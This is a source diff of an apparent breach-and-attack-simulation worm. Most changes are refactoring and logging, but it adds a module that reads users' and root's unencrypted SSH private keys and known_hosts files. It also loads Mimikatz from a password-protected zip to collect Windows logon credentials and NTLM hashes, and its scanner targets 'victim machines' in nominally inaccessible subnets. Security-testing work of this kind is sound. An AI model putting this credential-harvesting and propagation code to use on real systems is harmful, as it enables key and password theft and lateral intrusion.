if WormConfiguration.local_network_scan: if WormConfiguration.local_network_scan:
self._ranges += get_interfaces_ranges() self._ranges += get_interfaces_ranges()
self._ranges += self._get_inaccessible_subnets_ips()
LOG.info("Base local networks to scan are: %r", self._ranges) LOG.info("Base local networks to scan are: %r", self._ranges)
def _get_inaccessible_subnets_ips(self):
"""
For each of the machine's IPs, checks if it's in one of the subnets specified in the
'inaccessible_subnets' config value. If so, all other subnets in the config value shouldn't be accessible.
All these subnets are returned.
:return: A list of subnets that shouldn't be accessible from the machine the monkey is running on.
"""
subnets_to_scan = []
if len(WormConfiguration.inaccessible_subnets) > 1:
for subnet_str in WormConfiguration.inaccessible_subnets:
if NetworkScanner._is_any_ip_in_subnet([unicode(x) for x in self._ip_addresses], subnet_str):
# If machine has IPs from 2 different subnets in the same group, there's no point checking the other
# subnet.
for other_subnet_str in WormConfiguration.inaccessible_subnets:
if other_subnet_str == subnet_str:
continue
if not NetworkScanner._is_any_ip_in_subnet([unicode(x) for x in self._ip_addresses],
other_subnet_str):
subnets_to_scan.append(NetworkRange.get_range_obj(other_subnet_str))
break
return subnets_to_scan
def get_victim_machines(self, scan_type, max_find=5, stop_callback=None): def get_victim_machines(self, scan_type, max_find=5, stop_callback=None):
assert issubclass(scan_type, HostScanner) assert issubclass(scan_type, HostScanner)
@ -76,3 +100,10 @@ class NetworkScanner(object):
if SCAN_DELAY: if SCAN_DELAY:
time.sleep(SCAN_DELAY) time.sleep(SCAN_DELAY)
@staticmethod
def _is_any_ip_in_subnet(ip_addresses, subnet_str):
for ip_address in ip_addresses:
if NetworkRange.get_range_obj(subnet_str).is_in_range(ip_address):
return True
return False

View File

@ -144,13 +144,13 @@ class SMBFinger(HostFinger):
host.os['type'] = 'linux' host.os['type'] = 'linux'
host.services[SMB_SERVICE]['name'] = service_client host.services[SMB_SERVICE]['name'] = service_client
if not host.os.has_key('version'): if 'version' not in host.os:
host.os['version'] = os_version host.os['version'] = os_version
else: else:
host.services[SMB_SERVICE]['os-version'] = os_version host.services[SMB_SERVICE]['os-version'] = os_version
return True return True
except Exception, exc: except Exception as exc:
LOG.debug("Error getting smb fingerprint: %s", exc) LOG.debug("Error getting smb fingerprint: %s", exc)
return False return False

View File

@ -2,7 +2,7 @@ from itertools import izip_longest
from random import shuffle from random import shuffle
from network import HostScanner, HostFinger from network import HostScanner, HostFinger
from network.tools import check_tcp_ports from network.tools import check_tcp_ports, tcp_port_to_service
__author__ = 'itamar' __author__ = 'itamar'
@ -31,7 +31,7 @@ class TcpScanner(HostScanner, HostFinger):
ports, banners = check_tcp_ports(host.ip_addr, target_ports, self._config.tcp_scan_timeout / 1000.0, ports, banners = check_tcp_ports(host.ip_addr, target_ports, self._config.tcp_scan_timeout / 1000.0,
self._config.tcp_scan_get_banner) self._config.tcp_scan_get_banner)
for target_port, banner in izip_longest(ports, banners, fillvalue=None): for target_port, banner in izip_longest(ports, banners, fillvalue=None):
service = 'tcp-' + str(target_port) service = tcp_port_to_service(target_port)
host.services[service] = {} host.services[service] = {}
if banner: if banner:
host.services[service]['banner'] = banner host.services[service]['banner'] = banner

View File

@ -8,6 +8,7 @@ DEFAULT_TIMEOUT = 10
BANNER_READ = 1024 BANNER_READ = 1024
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
SLEEP_BETWEEN_POLL = 0.5
def struct_unpack_tracker(data, index, fmt): def struct_unpack_tracker(data, index, fmt):
@ -126,15 +127,24 @@ def check_tcp_ports(ip, ports, timeout=DEFAULT_TIMEOUT, get_banner=False):
LOG.warning("Failed to connect to port %s, error code is %d", port, err) LOG.warning("Failed to connect to port %s, error code is %d", port, err)
if len(possible_ports) != 0: if len(possible_ports) != 0:
time.sleep(timeout) timeout = int(round(timeout)) # clamp to integer, to avoid checking input
sock_objects = [s[1] for s in possible_ports] time_left = timeout
# first filter sockets_to_try = possible_ports[:]
_, writeable_sockets, _ = select.select(sock_objects, sock_objects, sock_objects, 0) connected_ports_sockets = []
for s in writeable_sockets: while (time_left >= 0) and len(sockets_to_try):
try: # actual test sock_objects = [s[1] for s in sockets_to_try]
connected_ports_sockets.append((s.getpeername()[1], s))
except socket.error: # bad socket, select didn't filter it properly _, writeable_sockets, _ = select.select(sock_objects, sock_objects, sock_objects, 0)
pass for s in writeable_sockets:
try: # actual test
connected_ports_sockets.append((s.getpeername()[1], s))
except socket.error: # bad socket, select didn't filter it properly
pass
sockets_to_try = [s for s in sockets_to_try if s not in connected_ports_sockets]
if sockets_to_try:
time.sleep(SLEEP_BETWEEN_POLL)
timeout -= SLEEP_BETWEEN_POLL
LOG.debug( LOG.debug(
"On host %s discovered the following ports %s" % "On host %s discovered the following ports %s" %
(str(ip), ",".join([str(s[0]) for s in connected_ports_sockets]))) (str(ip), ",".join([str(s[0]) for s in connected_ports_sockets])))
@ -154,3 +164,7 @@ def check_tcp_ports(ip, ports, timeout=DEFAULT_TIMEOUT, get_banner=False):
except socket.error as exc: except socket.error as exc:
LOG.warning("Exception when checking ports on host %s, Exception: %s", str(ip), exc) LOG.warning("Exception when checking ports on host %s, Exception: %s", str(ip), exc)
return [], [] return [], []
def tcp_port_to_service(port):
return 'tcp-' + str(port)

View File

@ -0,0 +1,25 @@
import os
import sys
__author__ = 'itay.mizeretz'
def get_binaries_dir_path():
"""
Gets the path to the binaries dir (files packaged in pyinstaller if it was used, infection_monkey dir otherwise)
:return: Binaries dir path
"""
if getattr(sys, 'frozen', False):
return sys._MEIPASS
else:
return os.path.dirname(os.path.abspath(__file__))
def get_binary_file_path(filename):
"""
Gets the path to a binary file
:param filename: name of the file
:return: Path to file
"""
return os.path.join(get_binaries_dir_path(), filename)

View File

@ -70,4 +70,9 @@ Sambacry requires two standalone binaries to execute remotely.
Mimikatz is required for the Monkey to be able to steal credentials on Windows. It's possible to either compile from sources (requires Visual Studio 2013 and up) or download the binaries from Mimikatz is required for the Monkey to be able to steal credentials on Windows. It's possible to either compile from sources (requires Visual Studio 2013 and up) or download the binaries from
https://github.com/guardicore/mimikatz/releases/tag/1.0.0 https://github.com/guardicore/mimikatz/releases/tag/1.0.0
Download both 32 and 64 bit DLLs and place them under [code location]\infection_monkey\bin Download both 32 and 64 bit zipped DLLs and place them under [code location]\infection_monkey\bin
Alternatively, if you build Mimikatz, put each version in a zip file.
1. The zip should contain only the Mimikatz DLL named tmpzipfile123456.dll
2. It should be protected using the password 'VTQpsJPXgZuXhX6x3V84G'.
3. The zip file should be named mk32.zip/mk64.zip accordingly.
4. Zipping with 7zip has been tested. Other zipping software may not work.

View File

@ -10,8 +10,7 @@ odict
paramiko paramiko
psutil==3.4.2 psutil==3.4.2
PyInstaller PyInstaller
six
ecdsa ecdsa
netifaces netifaces
mock
nose
ipaddress ipaddress

View File

@ -0,0 +1,96 @@
import logging
import pwd
import os
import glob
__author__ = 'VakarisZ'
LOG = logging.getLogger(__name__)
class SSHCollector(object):
"""
SSH keys and known hosts collection module
"""
default_dirs = ['/.ssh/', '/']
@staticmethod
def get_info():
LOG.info("Started scanning for ssh keys")
home_dirs = SSHCollector.get_home_dirs()
ssh_info = SSHCollector.get_ssh_files(home_dirs)
LOG.info("Scanned for ssh keys")
return ssh_info
@staticmethod
def get_ssh_struct(name, home_dir):
"""
:return: SSH info struct with these fields:
name: username of user, for whom the keys belong
home_dir: users home directory
public_key: contents of *.pub file(public key)
private_key: contents of * file(private key)
known_hosts: contents of known_hosts file(all the servers keys are good for,
possibly hashed)
"""
return {'name': name, 'home_dir': home_dir, 'public_key': None,
'private_key': None, 'known_hosts': None}
@staticmethod
def get_home_dirs():
root_dir = SSHCollector.get_ssh_struct('root', '')
home_dirs = [SSHCollector.get_ssh_struct(x.pw_name, x.pw_dir) for x in pwd.getpwall()
if x.pw_dir.startswith('/home')]
home_dirs.append(root_dir)
return home_dirs
@staticmethod
def get_ssh_files(usr_info):
for info in usr_info:
path = info['home_dir']
for directory in SSHCollector.default_dirs:
if os.path.isdir(path + directory):
try:
current_path = path + directory
# Searching for public key
if glob.glob(os.path.join(current_path, '*.pub')):
# Getting first file in current path with .pub extension(public key)
public = (glob.glob(os.path.join(current_path, '*.pub'))[0])
LOG.info("Found public key in %s" % public)
try:
with open(public) as f:
info['public_key'] = f.read()
# By default private key has the same name as public, only without .pub
private = os.path.splitext(public)[0]
if os.path.exists(private):
try:
with open(private) as f:
# no use from ssh key if it's encrypted
private_key = f.read()
if private_key.find('ENCRYPTED') == -1:
info['private_key'] = private_key
LOG.info("Found private key in %s" % private)
else:
continue
except (IOError, OSError):
pass
# By default known hosts file is called 'known_hosts'
known_hosts = os.path.join(current_path, 'known_hosts')
if os.path.exists(known_hosts):
try:
with open(known_hosts) as f:
info['known_hosts'] = f.read()
LOG.info("Found known_hosts in %s" % known_hosts)
except (IOError, OSError):
pass
# If private key found don't search more
if info['private_key']:
break
except (IOError, OSError):
pass
except OSError:
pass
usr_info = [info for info in usr_info if info['private_key'] or info['known_hosts']
or info['public_key']]
return usr_info

View File

@ -1,6 +1,7 @@
import logging import logging
from . import InfoCollector from . import InfoCollector
from SSH_info_collector import SSHCollector
__author__ = 'uri' __author__ = 'uri'
@ -26,4 +27,6 @@ class LinuxInfoCollector(InfoCollector):
self.get_process_list() self.get_process_list()
self.get_network_info() self.get_network_info()
self.get_azure_info() self.get_azure_info()
self.info['ssh_info'] = SSHCollector.get_info()
return self.info return self.info

View File

@ -2,6 +2,9 @@ import binascii
import ctypes import ctypes
import logging import logging
import socket import socket
import zipfile
from pyinstaller_utils import get_binary_file_path, get_binaries_dir_path
__author__ = 'itay.mizeretz' __author__ = 'itay.mizeretz'
@ -13,18 +16,36 @@ class MimikatzCollector(object):
Password collection module for Windows using Mimikatz. Password collection module for Windows using Mimikatz.
""" """
def __init__(self): # Name of Mimikatz DLL. Must be name of file in Mimikatz zip.
try: MIMIKATZ_DLL_NAME = 'tmpzipfile123456.dll'
self._isInit = False # Name of ZIP containing Mimikatz. Must be identical to one on monkey.spec
self._config = __import__('config').WormConfiguration MIMIKATZ_ZIP_NAME = 'tmpzipfile123456.zip'
self._dll = ctypes.WinDLL(self._config.mimikatz_dll_name)
# Password to Mimikatz zip file
MIMIKATZ_ZIP_PASSWORD = r'VTQpsJPXgZuXhX6x3V84G'
def __init__(self):
self._config = __import__('config').WormConfiguration
self._isInit = False
self._dll = None
self._collect = None
self._get = None
self.init_mimikatz()
def init_mimikatz(self):
try:
with zipfile.ZipFile(get_binary_file_path(MimikatzCollector.MIMIKATZ_ZIP_NAME), 'r') as mimikatz_zip:
mimikatz_zip.extract(self.MIMIKATZ_DLL_NAME, path=get_binaries_dir_path(),
pwd=self.MIMIKATZ_ZIP_PASSWORD)
self._dll = ctypes.WinDLL(get_binary_file_path(self.MIMIKATZ_DLL_NAME))
collect_proto = ctypes.WINFUNCTYPE(ctypes.c_int) collect_proto = ctypes.WINFUNCTYPE(ctypes.c_int)
get_proto = ctypes.WINFUNCTYPE(MimikatzCollector.LogonData) get_proto = ctypes.WINFUNCTYPE(MimikatzCollector.LogonData)
self._collect = collect_proto(("collect", self._dll)) self._collect = collect_proto(("collect", self._dll))
self._get = get_proto(("get", self._dll)) self._get = get_proto(("get", self._dll))
self._isInit = True self._isInit = True
except StandardError: except Exception:
LOG.exception("Error initializing mimikatz collector") LOG.exception("Error initializing mimikatz collector")
def get_logon_info(self): def get_logon_info(self):
@ -71,7 +92,7 @@ class MimikatzCollector(object):
logon_data_dictionary[username]["ntlm_hash"] = ntlm_hash logon_data_dictionary[username]["ntlm_hash"] = ntlm_hash
return logon_data_dictionary return logon_data_dictionary
except StandardError: except Exception:
LOG.exception("Error getting logon info") LOG.exception("Error getting logon info")
return {} return {}

View File

@ -15,6 +15,7 @@ class WindowsInfoCollector(InfoCollector):
def __init__(self): def __init__(self):
super(WindowsInfoCollector, self).__init__() super(WindowsInfoCollector, self).__init__()
self._config = __import__('config').WormConfiguration
def get_info(self): def get_info(self):
""" """
@ -28,7 +29,13 @@ class WindowsInfoCollector(InfoCollector):
self.get_process_list() self.get_process_list()
self.get_network_info() self.get_network_info()
self.get_azure_info() self.get_azure_info()
mimikatz_collector = MimikatzCollector() self._get_mimikatz_info()
mimikatz_info = mimikatz_collector.get_logon_info()
self.info["credentials"].update(mimikatz_info)
return self.info return self.info
def _get_mimikatz_info(self):
if self._config.should_use_mimikatz:
LOG.info("Using mimikatz")
self.info["credentials"].update(MimikatzCollector().get_logon_info())
else:
LOG.info("Not using mimikatz")

View File

@ -1,45 +0,0 @@
# -*- coding: UTF-8 -*-
# NOTE: Launch all tests with `nosetests` command from infection_monkey dir.
import json
import unittest
from mock import Mock, patch
import control
from config import GUID
class ReportConfigErrorTestCase(unittest.TestCase):
"""
When unknown config variable received form the island server, skip it and report config
error back to the server.
"""
config_response = Mock(json=Mock(return_value={'config': {'blah': 'blah'}}))
def teardown(self):
patch.stopall()
def test_config(self):
patch('control.requests.patch', Mock()).start()
patch('control.WormConfiguration', Mock(current_server='127.0.0.1:123')).start()
# GIVEN the server with uknown config variable
patch('control.requests.get', Mock(return_value=self.config_response)).start()
# WHEN monkey tries to load config from server
control.ControlClient.load_control_config()
# THEN she reports config error back to the server
control.requests.patch.assert_called_once_with(
"https://127.0.0.1:123/api/monkey/%s" % GUID,
data=json.dumps({'config_error': True}),
headers={'content-type': 'application/json'},
verify=False,
proxies=control.ControlClient.proxies)
if __name__ == '__main__':
unittest.main()

View File

@ -1,4 +1,3 @@
from ftp import FTPServer from http import HTTPServer, LockedHTTPServer
from http import HTTPServer
__author__ = 'hoffer' __author__ = 'hoffer'

View File

@ -1,174 +0,0 @@
import socket, threading, time
import StringIO
__author__ = 'hoffer'
class FTPServer(threading.Thread):
def __init__(self, local_ip, local_port, files):
self.files=files
self.cwd='/'
self.mode='I'
self.rest=False
self.pasv_mode=False
self.local_ip = local_ip
self.local_port = local_port
threading.Thread.__init__(self)
def run(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.bind((self.local_ip,self.local_port))
self.sock.listen(1)
self.conn, self.addr = self.sock.accept()
self.conn.send('220 Welcome!\r\n')
while True:
if 0 == len(self.files):
break
cmd=self.conn.recv(256)
if not cmd: break
else:
try:
func=getattr(self,cmd[:4].strip().upper())
func(cmd)
except Exception,e:
self.conn.send('500 Sorry.\r\n')
break
self.conn.close()
self.sock.close()
def SYST(self,cmd):
self.conn.send('215 UNIX Type: L8\r\n')
def OPTS(self,cmd):
if cmd[5:-2].upper()=='UTF8 ON':
self.conn.send('200 OK.\r\n')
else:
self.conn.send('451 Sorry.\r\n')
def USER(self,cmd):
self.conn.send('331 OK.\r\n')
def PASS(self,cmd):
self.conn.send('230 OK.\r\n')
def QUIT(self,cmd):
self.conn.send('221 Goodbye.\r\n')
def NOOP(self,cmd):
self.conn.send('200 OK.\r\n')
def TYPE(self,cmd):
self.mode=cmd[5]
self.conn.send('200 Binary mode.\r\n')
def CDUP(self,cmd):
self.conn.send('200 OK.\r\n')
def PWD(self,cmd):
self.conn.send('257 \"%s\"\r\n' % self.cwd)
def CWD(self,cmd):
self.conn.send('250 OK.\r\n')
def PORT(self,cmd):
if self.pasv_mode:
self.servsock.close()
self.pasv_mode = False
l = cmd[5:].split(',')
self.dataAddr='.'.join(l[:4])
self.dataPort=(int(l[4])<<8)+int(l[5])
self.conn.send('200 Get port.\r\n')
def PASV(self,cmd):
self.pasv_mode = True
self.servsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.servsock.bind((local_ip,0))
self.servsock.listen(1)
ip, port = self.servsock.getsockname()
self.conn.send('227 Entering Passive Mode (%s,%u,%u).\r\n' %
(','.join(ip.split('.')), port>>8&0xFF, port&0xFF))
def start_datasock(self):
if self.pasv_mode:
self.datasock, addr = self.servsock.accept()
else:
self.datasock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.datasock.connect((self.dataAddr,self.dataPort))
def stop_datasock(self):
self.datasock.close()
if self.pasv_mode:
self.servsock.close()
def LIST(self,cmd):
self.conn.send('150 Here comes the directory listing.\r\n')
self.start_datasock()
for fn in self.files.keys():
k=self.toListItem(fn)
self.datasock.send(k+'\r\n')
self.stop_datasock()
self.conn.send('226 Directory send OK.\r\n')
def toListItem(self,fn):
fullmode='rwxrwxrwx'
mode = ''
d = '-'
ftime=time.strftime(' %b %d %H:%M ', time.gmtime())
return d+fullmode+' 1 user group '+str(self.files[fn].tell())+ftime+fn
def MKD(self,cmd):
self.conn.send('257 Directory created.\r\n')
def RMD(self,cmd):
self.conn.send('450 Not allowed.\r\n')
def DELE(self,cmd):
self.conn.send('450 Not allowed.\r\n')
def SIZE(self,cmd):
self.conn.send('450 Not allowed.\r\n')
def RNFR(self,cmd):
self.conn.send('350 Ready.\r\n')
def RNTO(self,cmd):
self.conn.send('250 File renamed.\r\n')
def REST(self,cmd):
self.pos=int(cmd[5:-2])
self.rest=True
self.conn.send('250 File position reseted.\r\n')
def RETR(self,cmd):
fn = cmd[5:-2]
if self.mode=='I':
fi=self.files[fn]
else:
fi=self.files[fn]
self.conn.send('150 Opening data connection.\r\n')
if self.rest:
fi.seek(self.pos)
self.rest=False
data= fi.read(1024)
self.start_datasock()
while data:
self.datasock.send(data)
data=fi.read(1024)
fi.close()
del self.files[fn]
self.stop_datasock()
self.conn.send('226 Transfer complete.\r\n')
def STOR(self,cmd):
fn = cmd[5:-2]
fo = StringIO.StringIO()
self.conn.send('150 Opening data connection.\r\n')
self.start_datasock()
while True:
data=self.datasock.recv(1024)
if not data: break
fo.write(data)
fo.seek(0)
self.stop_datasock()
self.conn.send('226 Transfer complete.\r\n')

View File

@ -6,6 +6,7 @@ import threading
import urllib import urllib
from logging import getLogger from logging import getLogger
from urlparse import urlsplit from urlparse import urlsplit
from threading import Lock
import monkeyfs import monkeyfs
from base import TransportProxyBase, update_last_serve_time from base import TransportProxyBase, update_last_serve_time
@ -122,7 +123,7 @@ class HTTPConnectProxyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
address = (u.hostname, u.port or 443) address = (u.hostname, u.port or 443)
try: try:
conn = socket.create_connection(address) conn = socket.create_connection(address)
except socket.error, e: except socket.error as e:
LOG.debug("HTTPConnectProxyHandler: Got exception while trying to connect to %s: %s" % (repr(address), e)) LOG.debug("HTTPConnectProxyHandler: Got exception while trying to connect to %s: %s" % (repr(address), e))
self.send_error(504) # 504 Gateway Timeout self.send_error(504) # 504 Gateway Timeout
return return
@ -183,6 +184,49 @@ class HTTPServer(threading.Thread):
self.join(timeout) self.join(timeout)
class LockedHTTPServer(threading.Thread):
"""
Same as HTTPServer used for file downloads just with locks to avoid racing conditions.
You create a lock instance and pass it to this server's constructor. Then acquire the lock
before starting the server and after it. Once the server starts it will release the lock
and subsequent code will be able to continue to execute. That way subsequent code will
always call already running HTTP server
"""
# Seconds to wait until server stops
STOP_TIMEOUT = 5
def __init__(self, local_ip, local_port, filename, lock, max_downloads=1):
self._local_ip = local_ip
self._local_port = local_port
self._filename = filename
self.max_downloads = max_downloads
self.downloads = 0
self._stopped = False
self.lock = lock
threading.Thread.__init__(self)
self.daemon = True
def run(self):
class TempHandler(FileServHTTPRequestHandler):
filename = self._filename
@staticmethod
def report_download(dest=None):
LOG.info('File downloaded from (%s,%s)' % (dest[0], dest[1]))
self.downloads += 1
httpd = BaseHTTPServer.HTTPServer((self._local_ip, self._local_port), TempHandler)
self.lock.release()
while not self._stopped and self.downloads < self.max_downloads:
httpd.handle_request()
self._stopped = True
def stop(self, timeout=STOP_TIMEOUT):
self._stopped = True
self.join(timeout)
class HTTPConnectProxy(TransportProxyBase): class HTTPConnectProxy(TransportProxyBase):
def run(self): def run(self):
httpd = BaseHTTPServer.HTTPServer((self.local_host, self.local_port), HTTPConnectProxyHandler) httpd = BaseHTTPServer.HTTPServer((self.local_host, self.local_port), HTTPConnectProxyHandler)

View File

@ -63,7 +63,7 @@ class TcpProxy(TransportProxyBase):
try: try:
dest = socket.socket(socket.AF_INET, socket.SOCK_STREAM) dest = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
dest.connect((self.dest_host, self.dest_port)) dest.connect((self.dest_host, self.dest_port))
except socket.error, ex: except socket.error as ex:
source.close() source.close()
dest.close() dest.close()
continue continue

View File

@ -29,3 +29,4 @@ def is_64bit_python():
def is_windows_os(): def is_windows_os():
return sys.platform.startswith("win") return sys.platform.startswith("win")

View File

@ -14,6 +14,7 @@ from cc.resources.client_run import ClientRun
from cc.resources.edge import Edge from cc.resources.edge import Edge
from cc.resources.local_run import LocalRun from cc.resources.local_run import LocalRun
from cc.resources.log import Log from cc.resources.log import Log
from cc.resources.island_logs import IslandLog
from cc.resources.monkey import Monkey from cc.resources.monkey import Monkey
from cc.resources.monkey_configuration import MonkeyConfiguration from cc.resources.monkey_configuration import MonkeyConfiguration
from cc.resources.monkey_download import MonkeyDownload from cc.resources.monkey_download import MonkeyDownload
@ -104,5 +105,6 @@ def init_app(mongo_url):
api.add_resource(Report, '/api/report', '/api/report/') api.add_resource(Report, '/api/report', '/api/report/')
api.add_resource(TelemetryFeed, '/api/telemetry-feed', '/api/telemetry-feed/') api.add_resource(TelemetryFeed, '/api/telemetry-feed', '/api/telemetry-feed/')
api.add_resource(Log, '/api/log', '/api/log/') api.add_resource(Log, '/api/log', '/api/log/')
api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/')
return app return app

View File

@ -1,7 +1,11 @@
import json import json
import logging
import standard import standard
import aws import aws
logger = logging.getLogger(__name__)
ENV_DICT = { ENV_DICT = {
'standard': standard.StandardEnvironment, 'standard': standard.StandardEnvironment,
'aws': aws.AwsEnvironment 'aws': aws.AwsEnvironment
@ -18,6 +22,7 @@ def load_env_from_file():
try: try:
__env_type = load_env_from_file() __env_type = load_env_from_file()
env = ENV_DICT[__env_type]() env = ENV_DICT[__env_type]()
logger.info('Monkey\'s env is: {0}'.format(env.__class__.__name__))
except Exception: except Exception:
print('Failed initializing environment: %s' % __env_type) logger.error('Failed initializing environment', exc_info=True)
raise raise

View File

@ -0,0 +1,26 @@
import os
import json
import logging.config
__author__ = 'Maor.Rayzin'
def json_setup_logging(default_path='logging.json', default_level=logging.INFO, env_key='LOG_CFG'):
"""
Setup the logging configuration
:param default_path: the default log configuration file path
:param default_level: Default level to log from
:param env_key: SYS ENV key to use for external configuration file path
:return:
"""
path = default_path
value = os.getenv(env_key, None)
if value:
path = value
if os.path.exists(path):
with open(path, 'rt') as f:
config = json.load(f)
logging.config.dictConfig(config)
else:
logging.basicConfig(level=default_level)

View File

@ -0,0 +1,33 @@
{
"version": 1,
"disable_existing_loggers": false,
"formatters": {
"simple": {
"format": "%(asctime)s - %(filename)s:%(lineno)s - %(funcName)10s() - %(levelname)s - %(message)s"
}
},
"handlers": {
"console": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "simple",
"stream": "ext://sys.stdout"
},
"info_file_handler": {
"class": "logging.handlers.RotatingFileHandler",
"level": "INFO",
"formatter": "simple",
"filename": "info.log",
"maxBytes": 10485760,
"backupCount": 20,
"encoding": "utf8"
}
},
"root": {
"level": "INFO",
"handlers": ["console", "info_file_handler"]
}
}

View File

@ -2,19 +2,30 @@ from __future__ import print_function # In python 2.7
import os import os
import sys import sys
import time import time
import logging
BASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) BASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
PARENT_PATH = os.path.dirname(BASE_PATH)
if PARENT_PATH not in sys.path:
sys.path.insert(0, PARENT_PATH)
if BASE_PATH not in sys.path: if BASE_PATH not in sys.path:
sys.path.insert(0, BASE_PATH) sys.path.insert(0, BASE_PATH)
from cc.island_logger import json_setup_logging
# This is here in order to catch EVERYTHING, some functions are being called on imports the log init needs to be on top.
json_setup_logging(default_path='island_logger_default_config.json', default_level=logging.DEBUG)
logger = logging.getLogger(__name__)
from cc.app import init_app from cc.app import init_app
from cc.utils import local_ip_addresses from cc.utils import local_ip_addresses
from cc.environment.environment import env from cc.environment.environment import env
from cc.database import is_db_server_up from cc.database import is_db_server_up
if __name__ == '__main__':
def main():
from tornado.wsgi import WSGIContainer from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop from tornado.ioloop import IOLoop
@ -22,7 +33,7 @@ if __name__ == '__main__':
mongo_url = os.environ.get('MONGO_URL', env.get_mongo_url()) mongo_url = os.environ.get('MONGO_URL', env.get_mongo_url())
while not is_db_server_up(mongo_url): while not is_db_server_up(mongo_url):
print('Waiting for MongoDB server') logger.info('Waiting for MongoDB server')
time.sleep(1) time.sleep(1)
app = init_app(mongo_url) app = init_app(mongo_url)
@ -33,6 +44,10 @@ if __name__ == '__main__':
ssl_options={'certfile': os.environ.get('SERVER_CRT', 'server.crt'), ssl_options={'certfile': os.environ.get('SERVER_CRT', 'server.crt'),
'keyfile': os.environ.get('SERVER_KEY', 'server.key')}) 'keyfile': os.environ.get('SERVER_KEY', 'server.key')})
http_server.listen(env.get_island_port()) http_server.listen(env.get_island_port())
print('Monkey Island Server is running on https://{}:{}'.format(local_ip_addresses()[0], env.get_island_port())) logger.info(
'Monkey Island Server is running on https://{}:{}'.format(local_ip_addresses()[0], env.get_island_port()))
IOLoop.instance().start() IOLoop.instance().start()
if __name__ == '__main__':
main()

View File

@ -1,3 +1,4 @@
import logging
from flask import request, jsonify from flask import request, jsonify
import flask_restful import flask_restful
@ -5,6 +6,8 @@ from cc.services.node import NodeService
__author__ = 'itay.mizeretz' __author__ = 'itay.mizeretz'
logger = logging.getLogger(__name__)
class ClientRun(flask_restful.Resource): class ClientRun(flask_restful.Resource):
def get(self): def get(self):
@ -17,6 +20,7 @@ class ClientRun(flask_restful.Resource):
if monkey is not None: if monkey is not None:
is_monkey_running = not monkey["dead"] is_monkey_running = not monkey["dead"]
else: else:
logger.info("Monkey is not running")
is_monkey_running = False is_monkey_running = False
return jsonify(is_running=is_monkey_running) return jsonify(is_running=is_monkey_running)

View File

@ -0,0 +1,19 @@
import logging
import flask_restful
from cc.auth import jwt_required
from cc.services.island_logs import IslandLogService
__author__ = "Maor.Rayzin"
logger = logging.getLogger(__name__)
class IslandLog(flask_restful.Resource):
@jwt_required()
def get(self):
try:
return IslandLogService.get_log_file()
except Exception as e:
logger.error('Monkey Island logs failed to download', exc_info=True)

View File

@ -13,6 +13,8 @@ from cc.utils import local_ip_addresses
__author__ = 'Barak' __author__ = 'Barak'
import logging
logger = logging.getLogger(__name__)
def run_local_monkey(): def run_local_monkey():
import platform import platform
@ -32,6 +34,7 @@ def run_local_monkey():
copyfile(monkey_path, target_path) copyfile(monkey_path, target_path)
os.chmod(target_path, stat.S_IRWXU | stat.S_IRWXG) os.chmod(target_path, stat.S_IRWXU | stat.S_IRWXG)
except Exception as exc: except Exception as exc:
logger.error('Copy file failed', exc_info=True)
return False, "Copy file failed: %s" % exc return False, "Copy file failed: %s" % exc
# run the monkey # run the monkey
@ -41,6 +44,7 @@ def run_local_monkey():
args = "".join(args) args = "".join(args)
pid = subprocess.Popen(args, shell=True).pid pid = subprocess.Popen(args, shell=True).pid
except Exception as exc: except Exception as exc:
logger.error('popen failed', exc_info=True)
return False, "popen failed: %s" % exc return False, "popen failed: %s" % exc
return True, "pis: %s" % pid return True, "pis: %s" % pid

View File

@ -17,7 +17,7 @@ class MonkeyConfiguration(flask_restful.Resource):
@jwt_required() @jwt_required()
def post(self): def post(self):
config_json = json.loads(request.data) config_json = json.loads(request.data)
if config_json.has_key('reset'): if 'reset' in config_json:
ConfigService.reset_config() ConfigService.reset_config()
else: else:
ConfigService.update_config(config_json, should_encrypt=True) ConfigService.update_config(config_json, should_encrypt=True)

View File

@ -1,3 +1,4 @@
import logging
import json import json
import os import os
@ -6,6 +7,8 @@ import flask_restful
__author__ = 'Barak' __author__ = 'Barak'
logger = logging.getLogger(__name__)
MONKEY_DOWNLOADS = [ MONKEY_DOWNLOADS = [
{ {
@ -18,6 +21,11 @@ MONKEY_DOWNLOADS = [
'machine': 'i686', 'machine': 'i686',
'filename': 'monkey-linux-32', 'filename': 'monkey-linux-32',
}, },
{
'type': 'linux',
'machine': 'i386',
'filename': 'monkey-linux-32',
},
{ {
'type': 'linux', 'type': 'linux',
'filename': 'monkey-linux-64', 'filename': 'monkey-linux-64',
@ -32,6 +40,16 @@ MONKEY_DOWNLOADS = [
'machine': 'amd64', 'machine': 'amd64',
'filename': 'monkey-windows-64.exe', 'filename': 'monkey-windows-64.exe',
}, },
{
'type': 'windows',
'machine': '64',
'filename': 'monkey-windows-64.exe',
},
{
'type': 'windows',
'machine': '32',
'filename': 'monkey-windows-32.exe',
},
{ {
'type': 'windows', 'type': 'windows',
'filename': 'monkey-windows-32.exe', 'filename': 'monkey-windows-32.exe',
@ -42,7 +60,10 @@ MONKEY_DOWNLOADS = [
def get_monkey_executable(host_os, machine): def get_monkey_executable(host_os, machine):
for download in MONKEY_DOWNLOADS: for download in MONKEY_DOWNLOADS:
if host_os == download.get('type') and machine == download.get('machine'): if host_os == download.get('type') and machine == download.get('machine'):
logger.info('Monkey exec found for os: {0} and machine: {1}'.format(host_os, machine))
return download return download
logger.warning('No monkey executables could be found for the host os or machine or both: host_os: {0}, machine: {1}'
.format(host_os, machine))
return None return None

View File

@ -1,4 +1,5 @@
from datetime import datetime from datetime import datetime
import logging
import flask_restful import flask_restful
from flask import request, make_response, jsonify from flask import request, make_response, jsonify
@ -12,6 +13,8 @@ from cc.utils import local_ip_addresses
__author__ = 'Barak' __author__ = 'Barak'
logger = logging.getLogger(__name__)
class Root(flask_restful.Resource): class Root(flask_restful.Resource):
@ -42,6 +45,7 @@ class Root(flask_restful.Resource):
# We can't drop system collections. # We can't drop system collections.
